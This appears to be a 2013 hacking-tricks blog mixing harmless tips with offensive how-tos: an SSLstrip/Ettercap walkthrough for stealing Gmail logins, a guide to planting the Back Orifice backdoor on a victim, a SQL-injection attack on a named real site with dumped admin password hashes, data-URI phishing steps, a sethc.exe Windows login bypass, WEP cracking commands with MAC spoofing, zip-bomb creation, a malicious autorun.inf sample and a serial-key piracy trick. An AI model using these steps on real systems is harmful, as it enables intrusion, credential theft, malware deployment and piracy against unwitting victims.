Showing posts with label Tricks. Show all posts
Showing posts with label Tricks. Show all posts

Sunday, 25 August 2013

Create Facebook Page without Name [How To] [Trick] video tut



Step #1:   
Create a Facebook page using the “More” link in the left sidebar’s bottom. You can also land on any page and click on “Create page” button there.


Step #2:
Select any category depending upon what your page should be. The category doesn’t matter in this trick.


Step #3:
 The name part in the category page matters a lot in this trick. Now, you may need some special characters temporarily for creating the page. The below text box will help you to copy the special characters. Place the mouse pointer on the text box and press Ctrl + A. Now, Ctrl + C will copy all the text right here in the text box.

copy this


Paste the copied text on the category page of Facebook where you are now for creating a invisible page.
Step #4:

 Click on “I agree to Facebook Pages terms” and get started. Now, you will be taken to the page for adding description, website and page username. Input description for the page and also page’s username (recommended). Provide other details if you wish, else skip them all. You may add those details later too. 

Step #5:

 After landing into the page, go to Edit Page > Update Info. Click Edit button near the name field. now, place the insertion point on the starting of the text in the text box and hit delete key on your keyboard. 

Step #6:

 Click on Save Changes to save the page name. View the page to see for the changes. If the name change was not proper, you can see a symbol in the page activity section. 

IF YOU STILL CANT UNDERSTAND THEN WATCH MY VIDEO ON YOUTUBE  

Tuesday, 30 July 2013

Autorun.inf attak!! ? read this and know what happen to inf file

Autorun.inf virus attack! Is autorun.inf virus?

This is the instructions that saved in the infected(call virus programs) autorun.inf file:

[Autorun] 
Open=RECYCLER\QqFvXcB.exe 
Explore=RECYCLER\QqFvXcB.exe 
AutoPlay=RECYCLER\QqFvXcB.exe 
shell\Open\Command=RECYCLER\QqFvXcB.exe 
shell\Open\Default=1 
shell\Explore\command=RECYCLER\QqFvXcB.exe 
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Introduction to Autorun.inf File:
Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted.  Simpy triggers.

When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file).

How to create Autorun file?
Open notepad

type this command:

[Autorun]

save the file as "autorun.inf" (select all files, not text )

Complete Syntax and instructions inside the Autorun file:
Basic syntax must be inside  the autorun.inf file is :

[Autorun]

This will be used to identify the the file as autorun.

OPEN=

This will specify which application should be opened when the cd or pen drive is opened

Example:

open=virus.exe

This will launch the virus.exe file when cd or pen drive is opened.  The file should be in root directory.

if the file is in any other sub directories ,then we have to specify it.

Open=RECYCLER\Virus.exe

Explore=

Nothing big difference. if you right click and select explore option in cd or pen drive.  This command will be run.

AutoPlay=

Same as the above , but it will launch the the program when auto played.

SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:

    shell\Open\Command=RECYCLER\QqFvXcB.exe
    shell\Open\Default=1
    shell\Explore\command=RECYCLER\QqFvXcB.exe
    shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=

Change the icon of your pen drive or cd.  you can use .ico,.bmp images(also .exe,.dll)

Example:

icon=hackingtalent.ico

Label=

Specifies a text label to displayed for this CD in Explorer

Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:

Label=Ethical hacking

Why Antivirus Block Autorun.inf file?
From above ,you come to know that autorun.inf file is not virus.  But why antivirus blocks it?  Because as i told autorun file call or launch any application or exe files.  It will lead to virus attack.  If the autorun.inf is blocked,then there is no way to launch the virus code.

Autorun is not virus but it can call virus files.

Friday, 5 July 2013

How To Open/Fix Blocked Adf.ly Links in India ?

Probably you may be noticed that the Adf.ly has blocked in India 2 days ago.Adf.ly site which allows you to shorten your URL link and on every visit of your short Adf.ly link you get earned, because its shows advertisement on every shortened link of Adf.ly.
So after the blocking of the same so many users were annoyed and many of our visitors and users requested us to provide them a powerful trick to open the blocked Adf.ly in India inorder to open the download links.Hence we are here to provide our visitors the powerful trick to open the blocked Adf.ly.Please follow the simple and powerful trick:

  • First of all collect the download link which is shortened by Adf.ly.
       Which may be like this :
  • http://adf.ly/abcd
  • Then Add v2.” in the links … as shown below:
  • http://v2.adf.ly/abcd

Wednesday, 29 May 2013

Truecaller hack How to Unlist Your Number from TrueCaller

TrueCaller is a mobile app and online service that serves as a very large phonebook for reverse phone number lookups. It’s helping you let know the names of unknown callers.
How does it work?
TrueCaller claims to source the caller information present in their database partly from public directories, and partly from “crowdsourced” data.
It looks like they scan and upload the entire phonebook to their servers. So if you install their app, it will make a note of all your contacts and upload them to the server.
Removing your Number
1. Goto http://www.truecaller.com/unlist/
2. Choose your country and enter the phone number in the relevant fields
3. Type the captcha
4. Press “Unlist”
Then they say the number was unlisted permanently and it takes 24 hours for the changes to happen.

Tuesday, 23 April 2013

How To Hack Using Man In The Middle Attack | SSL Hacking

Hello hacker Friends this is one of the most common attack that most hacker do to amaze people and i am gonna make it simple for you all so that you can enjoy it and try to learn this is attack so are you all ready so lets start . every one know about http attack but this is SSL means https attack nice trick  so lets begin .. :D u can watch my video on youtube ;) 

Tools Needed:



  •  SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial



  •  Ettercap to carry out mitm attacks..

  • Steps to Perform MITM Attack

    1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok 


    2.Now select the victim’s IP and click open



    3. Now open ettercap go to sniff -unsniffed sniffing and select your network interface and click ok 




    4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2


    5. Now select mitm-arp poisoning and click ok as shown 

     6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTP and not HTTPS Hence we are able to get the User id ,passwords 

    way2h security steps:-
    1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS 

    2. Always check the SSL certificate before doing an online transaction

    Stay Safe.Enjoy !!
    For Educational Purpose Only

    Tuesday, 19 March 2013

    Airtel 3G Unlimited GPRS Trick And Hack With Fastest Proxy 2013

    Follow the Instructions Below :-
    1. Create A New Airtel Manual Settings
    2. Apn : airtelgprs.com
    3. Proxy : 208.77.23.4
    4. Port : 80
    5. Home Page : fb.me
    6. If Its Not Working Try live.airtelworld.com
    7. ....... read more click here 

    CRETE ACCOUNT LOGIN AND READ REST OF THE TRICK 

    Monday, 18 February 2013

    Ubuntu password reset/login trick

    Reset Your Forgotten Ubuntu Password in 2 Minutes or Less

    If you’ve ever forgotten your password, you aren’t alone… it’s probably one of the most common tech support problems I’ve encountered over the years. Luckily if you are using Ubuntu they made it incredibly easy to reset your password.

    note:- I AM SHOWING UBUNTU 10.11


    1 Reboot your computer, and then as soon as you see the GRUB Loading screen, make sure to hit the ESC key so that you can get to the menu. 

    its look like this 

      2 Then press 'e'


    3 You’ll want to remove the “ro quiet splash” part with the backspace key, and then add this onto the end:
    rw init=/bin/bash
     I highlighted here 

     4 Then you have to do is press f10 key wait until you something like this



    5 Then simply type cd /home  then its says "root@(none):/home#"  


    6 Now type "ls" and press enter  this will show you the user name of system like this


    7 now u have to do is type passwd <username> example in here its like passwd way2h   then press enter now its tell us to enter new password  for given user  simply type two times and done :) 


    NOTE:- after u done this type
    reboot –f  
    I found that the –f parameter was necessary to get the reboot command to work for some reason. You could always hardware reset instead, but make sure to use the sync command first.

    ONLY FOR YOUR INFORMATION

    Sunday, 17 February 2013

    How to Use Backdoor

    Before download this software make sure your antivirus is turn off 

    Using the backdoor, hackers can remotely access your computer without any Authentication and do whatever the hacker wants. I will tell you some of the features of the rest of them you need to try and find out. The program:

    • Working as a key logger. 
    • Send any information from PC to PC Hacker's Victim. 
    • Running the program on the Victims PC.
    •  Display each image on the screen 
    • Violating the victim. 
    •  Open the CD drive of the PC victim. 
    • Open a Web page on the Victims Screen. 
    • Special keys or disable the whole keyboard.
    •  Shutdown PC victim. Songs start at PC.etc.etc Victims ... ... ... ... .
     The reverse of the best I have found is Back Orifice so I will discuss it.

     Back Orifice
     ========
    Back Orifice backdoor program is one of the most common, and one of the most deadly. The name may seem like a joke, but surely, the threat is real. Back Orifice was established in Cult of the Dead Cow. Back Orifice is an Open Source program. The main threat of this software is that by making some changes to the code anyone can make it undetectable by anti virus program that runs on the victim computer. Apart from the odd title, the program usually gets port 31 337, a reference to the phenomenon of "Lit" is popular among hackers.
    Basic Back Orifice consists of two major parts. "Client" and "server". The client is part of Bo2k that you use to control the other comp. By defult, it bo2kgui.exe Server is a file that you install on comp the other in order to control it. By defult, it bo2k.exe. Never run in the comp bo2k.exe yourself unless you know what you are doing. The other component is a plugin ipmortant. Simply put, the plugin addon for Bo2k. They increase the strength Bo2k. For a list of plugins for Bo2k, goto the official website Bo2k. To control the other comp, you must first send to the other party decides bo2k, and all other parties are running, you just start your bo2k client and using it you can assert your control.

    How to use Back Orifice?
    =================
    How to use it?
     First, you must configure both the client and server.

    1. First let's configure the server.
    2. Download a copy of Bo2k and unzip.

    3. Then run bo2kcfg.exe file.
       
    4. A window will appear welcoming you to bo2k configuration wizard.
    5. Click on the following (For the experts, they do not use the wizard, they configure manually.But one thing at a time first.)
    6. Then the wizard will prompt you for a file server bo2k (which bo2k.exe). By defult you just need to click next. But if you change your name or keep it in a different folder, go browsing for it.
    7. Now it will ask if you want the connection or connections TCPIO UDPIO. I would recommand TCPIO.
    8. Now they will ask you what port you want to listen to. The more popular ones are 6666, 54 321, 33 137, 31 336 and 4444. Try to advoid this. Try putting a number that you can remember easily. Avoid 12345, 1080, 8808.
    9. Now they will ask you for your encryption type. Usually you only get to choose the option XOR. Do not choose 3DES if you're not in the U.S..
    10. Now they will ask you what you want to password use.Choose one and remember it.
    11. Then click finish. The setup wizard will automatically part for your client. Be patient you can use it immediately.
    12. Now send the server (bo2k.exe) to the other party and the other party when it runs, you will be able to connect to.

    What to do when the victim clicks on the server?

    1. Start bo2kgui.exe.
    2. Click on the file, then the new server.
    3. Type in what ever name you want to call it.
    4. Now type in the ip address of the other party. If you do not know it, then you're in luck.
    5. If others in irc, just goto irc and type / dns and you will get the ip (plz dun include <> when typing / dns).
    6. Now click on connect.
    7. You will see a window that says "Please wait retriving server capabilities ..." However, if you see "Can not connect to remote server" which means that the other party did not run well Bo2k.exe or he is behind a firewall or maybe he has gone offline. Then you're in luck. :)
    8. One you have connnect, the right window, you should see some folders. I will explain the functions in the folders in the next post.

    Download Back Orifice 2000
     ===================
    Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net /projects/bo2k/


     
    How do I delete Back orifice 2000?
     ===================

    Removing Back Orifice 2000 ?

    may require that you modify the registry settings. To remove it at 7 simple steps, refer to the diagram below.
    Click Start> Run, and type "regedit" (without the quotes) Follow the path below:
    HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunServices " Now look in the right box: "The umgr32 = 'c: \ windows \ system \ umgr32.exe" Right click on the entry and click Delete. Now restart your computer. After restarting only open Windows Explorer. Make sure you can see all registered extensions. To do so, select "View Options and configure the appropriate settings. Go to the directory SYSTEM \ WINDOWS, and find "umgr32.exe" file. Once you find it, delete it. Exit Windows Explorer and reboot again.

    NOTE:
    =====
    Just for educational purposes, and if I get a good response on that, I would furthur explain the function of the folders and also how to add plugins in it.So leave your comments if you like it!

    Friday, 15 February 2013

    How to create new Partition without Formatting a Hard Disk?

    If your Hard-disk contain 3 partitions in your PC and you need to create 1 more partition then what will you do? Most of people are doing the following methods to create new partition in Hard-disk.

    Format the Hard-disk and create a new partition. Let’s see an easier method to create a new partition without formatting a Hard-disk.


    sorry about image size :(  


    Recently my friend asked  how to make partition without formatting whole HDD SO i just post this trick :) 

    To do this we don’t need any software and also no need to copy the data to separate drives. By doing the following methods we can create a New Partition from System Drive.

    Right Click on My Computer 
    Click Manage 
    Now “Computer Management” window will appear.

    In that window Click Storage 
    Then select Disk Management.

    In that window Hard-disk and other Storage Media detail will be shown.
    Now select a Disk drive to create a New Partition.

    Right Click on particular Drive then Click Shrink Volume. 
    Now windows will show the free space in particular partition.

    Type the disk size to create New Partition in Shrink Window.

    Now click on “Shrink”, within few seconds a New Disk will be created. 

    Still Accessible is not done in New Disk.

    Now Right Click on Unallocated Drive. Select New Simple Volume.

    Click on Next. Now give a size to the New Partition. (you can choice whole size right now)

    Select a Drive letter and Click on Next.

    Then select Format Setting ->
    File System -> 
    NTFS. And keep others as default. (if you need you can change this)


    Put a tick on “Performances a Quick Format” and Click on Next.
    Now the New Partition is created successfully.

    Phishing Using Dara URI

    * THIS IS ONLY A EXAMPLE OF DARA URL *

     

    How To Create Phishing Site Without Any Webhost Using Dara URI

    Hello, BTS readers, it has been long time since i blogged in this blog.  Today i come across interesting news update which share new technique used in the Phishing attack.

    Phishing is one of the popular social engineering attack used by Cybercriminals. In this method, hackers host a fake webpage which looks similar to the original page of the website.
    Then, hackers lure users to the phishing page by tricking them with legitimate-looking mails. If user enter the login data in the phishing page, the info will be stored in hackers database. At the end,  users will be redirected to original website so that users won't realize that they are under attack.

    From the above , it is clear that Cybercriminals need a webhosting for hosting their phishing page. But the recent research shows that hosting site is no longer needed.

    Henning Klevjer, an information security student at the University of Oslo in Norway, shows how a hacker can create phishing page using Data URI.

    What is Data URI?
    Data URLs are a Uniform Resource Identifier scheme that allow you to include data items inline in a web page as if they were being referenced as external resources. Data URLs are a form of Uniform Resource Locators, although they do not in fact remotely locate anything. Instead, the resource data is contained within the URL string itself . This saves the browser from having to make additional HTTP requests for the external resources, and can thus increase page loading speed.

    For Eg:
    <img src='data:image/gif;base64,R0lGODlhyAAyAIABAAAAAP///yH+EUNyZWF0ZWQgd2l0aCBHSU1QACH5BAEKAAEALAsADgC9ACQAAAL+jI+py+0Po5y02ouz3rz7D4biSJZmBqSoerZMCpDwHLsBvND6gWt6bXP0DEPfD3gq8o6sW/NyDD6KSgz1WaomtFqJEimNdCtXJK6Mdc62z3KOxV0vwS852z3P9/Y/9V3YFkhDFEW4k2f4p8CEwKhG11j4aIc3CXd5ODRmeDgHptlkBlpTFYcJNMppiujHw9r6qJgYiZp21/cKO7sYqrLKK0qKNWqn6zdWWSoou6lLOcxU29kpS2ttOUhL3Ie8vPuqHNNsnKrN7WhZB4kXvb690x2c65x2ZlsN+3VPL238DY6JQrk3kL4NBOjOiRhB/fD56gXxnz9+uXwBu7bEoCd0TvMqmVsoyV80bAP1uZOnahC6lHJCogtn7tM4kjIL4pp10CPCW+9sUpt0MV89aCbDGD2KVOC+pEybBlnqNKpUEMWmWr3aYSbWrVy7ev0KNqzYsWTLmj2LNq3atWzbun0LN67cuXTr2r2LN6/evXz7+v1btwAAOw==' alt='BTS_Image'/>
    The above code will display the following image in the page.


    The fun part of the Data URI is that you can directly enter the code in the browser address bar and load the content.

    For Eg:
    Pasting the following code in the browser address bar will load the image directly.
    data:image/gif;base64,R0lGODlhyAAyAIABAAAAAP///yH+EUNyZWF0ZWQgd2l0aCBHSU1QACH5BAEKAAEALAsADgC9ACQAAAL+jI+py+0Po5y02ouz3rz7D4biSJZmBqSoerZMCpDwHLsBvND6gWt6bXP0DEPfD3gq8o6sW/NyDD6KSgz1WaomtFqJEimNdCtXJK6Mdc62z3KOxV0vwS852z3P9/Y/9V3YFkhDFEW4k2f4p8CEwKhG11j4aIc3CXd5ODRmeDgHptlkBlpTFYcJNMppiujHw9r6qJgYiZp21/cKO7sYqrLKK0qKNWqn6zdWWSoou6lLOcxU29kpS2ttOUhL3Ie8vPuqHNNsnKrN7WhZB4kXvb690x2c65x2ZlsN+3VPL238DY6JQrk3kL4NBOjOiRhB/fD56gXxnz9+uXwBu7bEoCd0TvMqmVsoyV80bAP1uZOnahC6lHJCogtn7tM4kjIL4pp10CPCW+9sUpt0MV89aCbDGD2KVOC+pEybBlnqNKpUEMWmWr3aYSbWrVy7ev0KNqzYsWTLmj2LNq3atWzbun0LN67cuXTr2r2LN6/evXz7+v1btwAAOw==
    Not only Image, you can load text, html and other supported formats. You got my point?! Yes, Cyber Criminals are able to load the entire phishing page using the data URI method.

    The simplified version Data URI example(without base64 encoding):
    data:text/html, <h1>BreakTheSecurity</h1>
    Entering the above Data url in browser address bar will display the "BreakTheSecurity" text in the h1 format.

    Data URIs follow this scheme:

    data:[<mediatype>][;base64],<data>
    Here, <mediatype> are one of the MIME media types described in RFC 2046[1]. Base64 encoding is optional.

    How an attacker can use it for creating phishing page?
    This section is not suitable for the one who doesn't know how to create normal phishing page.

    Step 1:
    Copy the source code from the original site(right click and select 'view page source')
    Step 2:
    Modify the code such that transfer user credentials to another location.
    step 3:
    Now encode the source code with base 64.
    step 4:
    Once you got the encoded code, create data uri by following the above scheme.
    For Example
    data:text/html;base64, encoded_code_goes_here
    Alternatively you can use the site for creating the data URI:
    http://software.hixie.ch/utilities/cgi/data/data

    As the data url is too long, hackers will use the url shortening service. But google chrome shows warning whenever redirected from url shortening service to data url.

    Thursday, 14 February 2013

    How To Create Super Hidden Folder In Windows Using Command Prompt | Make a Super Hidden Folder in Windows Without any Extra Software





    way2h
    Almost anyone knows how to make a “hidden” folder in Windows, but then again almost anyone knows how to make explorer show hidden folders. Let’s take a look at how to make a folder so hidden, only you will know its there.

     
    Anyone that has used Windows for a while knows that they can right-click on a file or folder and edit its properties, more so its attributes to make it a so called “hidden” file or folder. The problem is that just as many people know you can show files and folders that have the “hidden” attribute by simply changing a radio button under the folder view options. The easiest way to make a real hidden file or folder is to mark it as an important operating system file, that way Windows wont display it even if explorer is set to display hidden files and folders.
    To do this we need to launch a command prompt, so press the Win + R key combination and type cmd then hit the enter button.
    66
    Now we are going to use the attrib command, so go ahead and type:

    attrib +s +h “C:\Users\Taylor Gibb\Desktop\Top Secret”
    You will need to replace the stuff in the inverted comma’s to an absolute path of a folder or file on your system  that you want to make hidden.
    22
    Now if I go look for the Top Secret folder on my Desktop it is gone, even with explorer set to show hidden files and folders.
    4
    To unhide the file or folder you can run the same command, except this time use “-“ instead of the “+” signs.

    attrib -s -h “C:\Users\Taylor Gibb\Desktop\Top Secret”
    6
    Like magic, my folder appeared again.
    9

    Warning

    While this method will catch 99% of people, if I knew for a fact that there was a hidden folder on a system that I was looking for there are many ways that will expose the folder. The easiest would be to make explorer show operating system files, which can be done through the same interface as showing hidden files.
    3
    Although any ordinary user who unchecks the box will most probably be scared off by the warning message that appears.
    2
    Hope this was informative, now go hide all your things.

    Android Hidden Secret Codes

    This code can give you access to a whole multitude of hidden menus, diagnostic tests and much more. Smartphones don’t hake exclusivity though – these codes can be found on both dumb and feature phones as well. Android devices have codes that are capable of being shared across a whole range of devices. Here we are going to tell you what some of these codes are. All are entered in the same way – input the code into the phone dialer and away you go.  As there are so many different manufacturers though there is no guarantee that all codes will work on all android devices but feel free to try them on Samsung, HTC, Sony, LG and Motorola devices, among others.

    Before we give you the codes though, a word of warning. Do not attempt to put these in unless you know what you are doing. Some of these codes will make substantial changes to your phone’s configuration and we will take no liability for any damage that occurs:
     
     
    *#06# – IMEI number
    *#0*# – Enter the service menu on newer phones like Galaxy S III
    *#*#4636#*#* – Phone information, usage statistics and battery
    *#*#34971539#*#* – Detailed camera information
    *#*#273282*255*663282*#*#* – Immediate backup of all media files
    *#*#197328640#*#* – Enable test mode for service
    *#*#232339#*#* – Wireless LAN tests
    *#*#0842#*#* – Backlight/vibration test
    *#*#2664#*#* – Test the touchscreen
    *#*#1111#*#* – FTA software version (1234 in the same code will give PDA and firmware version)
    *#12580*369# – Software and hardware info
    *#9090# – Diagnostic configuration
    *#872564# – USB logging control
    *#9900# – System dump mode
    *#301279# – HSDPA/HSUPA Control Menu
    *#7465625# – View phone lock status
    *#*#7780#*#* – Reset the /data partition to factory state
    *2767*3855# – Format device to factory state (will delete everything on phone)
    ##7764726 – Hidden service menu for Motorola Droid
    There are plenty more of these to be found on the internet, these are just some of the more common ones.
     

    Wednesday, 13 February 2013

    Learn how to hack websites using Auto SQL I Helper V.2.7 + with images

    I have been asked lately to write a tutorial on how to use "SQL I Helper V.2.7" tool.

    At the begening "SQLIHelperV.2.7" is a tool that will hack vulnerable websites using SQL injection. You don't have to spend hours and hours trying to find your way in a website and trying hundreds of combinations and codes to hack a website.
    This tool will do it all by itself. You only have to tell her what do and where to look.

    Click here to Download


    Lets start.
    first you need to find the potential website that you think it might be possible to hack it. Remember that some websites are simply unhackable.

    Use Exploit Scanner to find the vulnerable websites.
    Download

    and use this Dorks List to use it in the search
    Download

    And at the end once you find the admin username and his password use Admin finder to help you finding the admin login page but remember that this can't find all login pages. It use the most common extensions. You have the ability to add more extensions to the list to increase your search range.
    Download


    After you find your website ( better to end with "article.php?id=[number]" ) example: "http://encycl.anthropology.ru/article.php?id=1"

    I will explain my tut on how to hack this website.

    Check if your website can be hacked by trying to go this address :
    http://encycl.anthropology.ru/article.php?id='1 <-- notice the ' before the number 1.

    you should get this message:

    Code:
    Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

    This mean that this website can be hacked because you get an error.

    Now open your SQL I Helper V.2.7
    and write the link :
    http://encycl.anthropology.ru/article.php?id=1 <---- without the '
    here
    and press the inject button.

    Now you should wait until the tool finish searching for columns . Time may vary depending on your connection speed , your pc speed , and the number of columns in the website.
    So now you should have this:

     Make sure that the website support union otherwise the injection won't work.
    then select "Get database" and you get this:
    Now select any element from the "database name" box and press the "Get tables" button , I will select "anthropo_encycl":
    then select any element from the "table name" box and press the "Get columns" button , I will select "user":
    then select any elements you want from the "columns name" box and press "Dump Now" , i will select "usr_login" and "usr_pas


     After clicking "Dump Now" , you should see this new window


     Now copy the hash on a peace of paper and go to this website:
    http://www.md5crack.com/

    enter the hash and press the button "Crack that hash baby!" and you should get the source of the hash.
    hash:21232f297a57a5a743894a0e4a801fc3
    username: admin

    hash:202cb962ac59075b964b07152d234b70
    pass: 123

    COMMENT YOUR REVIEW :) 

    Friday, 8 February 2013

    The ZIP of Death

    -: The ZIP of Death :-

    This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.

    1) Make a.txt file

    2) Open and type the null character (alt + 255)

    3) Press ctrl + a then ctrl + v a couple times to make some null bytes

    4) If u have a hexeditor make the hex 00 for about 50 kilobytes.

    5) Now make several copies of a.txt and name accordingly

    6) Open cmd.exe

    7) Type copy /b *.txt b.txt

    8) Now every copy is made into a super copy and repeat

    9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
    Because of the simple construction of the file, 1gb of null bytes.....!

    The zip is only 1 mb in size and can really annoy friends.
    For added fun hex edit the zip and you will see a bunch of hex 5555

    Just add some more and the file will expand amazingly

    Make sure to not open this after

    You can always create your zip of death from the command line in linux
    dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

    Get serial key of any software

    Get serial key of any software

    1. Those who use trial versions of
    softwares.
    2. Go to GOOGLE.

    3. Type'94fbr'Then ­ space and then name of software key you need.

    4.Example : 94frb convertX

    5. Google will show you the links
    with your desired serial key or
    patch files.

    ByPaSs window 7 login without any CD's

    Follow the steps to bypass:

    1) Press the power button to turn on your computer.


    2) While ur on the screen with the animated microsoft logo press and hold the power button until turn off.


    3) Press the power button to turn on again.


    4) You should now see the option to bunch Start Up repair.. Select the option and press enter.


    5) Run Startup Repair.


    6) You should see a blue bar tht moves across the screen repeatedly. Above it should be messages
    tht say "searching for problems" or something. The message should change to "Attempting repairs" within a few minutes.


    7) Leave the computer running. This message should be there for 10-40 minutes depending on your computer.


    A message should pop up tht says "start up repair could not fix the problem". Click the arrow next to "show problem details".


    8) Scroll to the bottom and click the lnk to the .txt .


    9) Notepad should open up with the file.


    10) In notepad click File->Open. You can now use the file browser to perform the sethc.exe hack .


    11) Go to C:Windows\system32 and find sethc.exe and rename to random.exe or somethign.


    12) Copy the cmd.exe and rename the copied file to sethc.exe


    13) Restart the computer and at the login screen press the "shift" key 5 times n quick succession.


    14) Type in the cmd window "control userpasswords2" without the quotation marks.


    15) You can now make a new admin account and login

    Hacking WEP wifi passwords


    Basic Entry into a WEP Encrypted Network

    This Tutorial explains EVERYTHING in detail So, it is quite long. Enjoy.

    1. Getting the right tools
    This Tutorial is in Bt3 But Download The Latest Release Bt4.

    Download Backtrack 4. It can be found here:

    http://www.backtrack-linux.org/downloads/

     I downloaded the Dvd iso and burned it to a Dvd. Insert your BT4 Dvd/usb drive and reboot your computer into BT4. I always load into the 3rd boot option from the boot menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st option so be ready. The 1st option boots too slowly or not at all so always boot from the 2nd or 3rd. Experiment to see what works best for you.

    2. Preparing the slave network for attack

    Once in BT4, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.
    Type:

    airmon-ng

    You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card.
    Now type:

    airmon-ng stop ath0

    then type:

    ifconfig wifi0 down

    then:

    macchanger --mac 00:11:22:33:44:55 wifi0

    then:

    airmon-ng start wifi0

    What these steps did was to spoof (fake) your mac address so that JUST IN CASE your computeris discovered by someone as you are breaking in, they will not see your REAL mac address. Moving on...
    Now it's time to discover some networks to break into.

    Type:

    airodump-ng ath0

    Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all.
    Once you see the network that you want to crack, do this:

    hold down ctrl and type c

    This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.

    **Now from here on out, when I tell you to type a command, you need to replace whatever is in parenthesis with what I tell you to from your screen. For example: if i say to type:
    -c (channel)
    then dont actually type in
    -c (channel)
    Instead, replace that with whatever the channel number is...so, for example you would type:
    -c 6
    Can't be much clearer than that...lets continue...

    Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.

    [Image: airodump.jpg]

    Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --> 05:gk:30:fo:s9:2n
    The Channel number will be under a heading that says "CH".
    Now, in the same Konsole window, type:

    airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

    the FILE NAME can be whatever you want. This is simply the place that airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.

    **Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.

    Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password.

    Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.

    3. Actually cracking the WEP password

    Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:

    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

    http://i574.photobucket.com/albums/ss184...eplay1.jpg

    This will send some commands to the router that basically cause it to associate with your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)" If this happens, then good! You are almost there. Now type:

    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

    http://i574.photobucket.com/albums/ss184...eplay2.jpg

    This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

    Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:

    aircrack-ng -b (bssid) (filename)-01.cap

    Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
    Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

    http://i574.photobucket.com/albums/ss184...crack1.jpg

    If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

    Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
    se:cr:et
    This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
    0F:KW:94:27:VF
    Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

    It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

    I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)

    I will gladly answer any legitimate questions anyone has to the best of my ability.
